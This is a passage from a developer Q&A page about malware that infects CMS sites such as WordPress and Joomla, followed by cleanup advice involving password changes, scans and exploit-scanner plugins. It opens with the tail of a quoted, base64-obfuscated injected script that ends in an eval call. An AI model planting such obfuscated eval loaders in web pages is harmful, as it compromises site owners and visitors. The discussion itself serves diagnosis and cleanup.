Jy5zdWJzdHIoYy09KHg9YzwyPzE6MikseCkpKS5qb2luKHQucG9wKCkpKTtldmFsKGQpPC9zY3JpcHQ+');}

It seems that this virus/malware is affecting several CMS such as Joomla, Wordpress, CodeIgniter, etc. Some more info here and here.

like image 129
obaqueiro Avatar answered Oct 24 '22 02:10

obaqueiro


Best course of action:

  • change ALL ftp and username passwords QUICKLY
  • uninstall all FTP program(s) on your pc
  • run virus scan & malware scan
  • make sure your pc is clean
  • reinstall FTP client (clean install - download new version of software)

now to clean your WP website. - install WP plugins (tac, exploit scanner) - run plugins - note infected files - use FTP or WP plugin editor to clean these files - run exploit scanner & tac till website is clean

Hope this helps...

like image 20
Bobby Avatar answered Oct 24 '22 04:10

Bobby



Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!